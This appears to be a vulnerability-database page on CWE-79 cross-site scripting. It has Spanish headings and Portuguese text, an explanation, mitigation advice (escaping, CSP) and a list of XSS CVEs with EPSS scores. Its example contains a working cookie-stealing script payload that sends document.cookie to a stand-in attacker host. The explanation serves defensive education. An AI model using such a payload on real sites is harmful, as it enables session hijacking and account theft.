Fallos del tipo CWE-79

28.628 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2018-0450—Cisco Data Center Network Manager Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-43170MEDIUMA stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of RukEPSS 0.9%CVE-2018-15400—Cisco Cloud Services Platform 2100 Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-43166MEDIUMA stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1EPSS 0.9%CVE-2018-15434—Cisco Unified IP Phone 7900 Series Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2026-22813CRITICALMalicious website can execute commands on the local system through XSS in the OpenCode web UIEPSS 0.9%CVE-2022-43169MEDIUMA stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of RukovoEPSS 0.9%CVE-2022-43165MEDIUMA stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1EPSS 0.9%CVE-2018-0452—Cisco Tetration Analytics Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-43164MEDIUMA stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 aEPSS 0.9%CVE-2019-1655MEDIUMCisco Webex Meetings Server Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2023-2587HIGH Teltonika’s Remote Management System versions prior to 4.10.0 contain a cross-site scripting (XSS) vulnerability in the main page of the weEPSS 0.9%CVE-2018-19954—The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could EPSS 0.9%CVE-2019-9509MEDIUMThe web interface of the Vertiv Avocent UMG-4000 version 4.2.1.19 is vulnerable to reflected cross site scriptingEPSS 0.9%CVE-2018-19956—The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could EPSS 0.9%CVE-2021-24976—Smart SEO Tool < 3.0.6 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2018-19955—The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could EPSS 0.9%CVE-2018-16468—In the Loofah gem for Ruby, through v2.2.2, unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished.EPSS 0.9%CVE-2023-39513MEDIUMStored Cross-site Scripting on host.php verbose data-query debug view in CactiEPSS 0.9%CVE-2021-23038—On version 16.0.x before 16.0.1.2, 15.1.x before 15.1.3.1, 14.1.x before 14.1.4.2, 13.1.x before 13.1.4.1, and all versions of 12.1.x, a stoEPSS 0.9%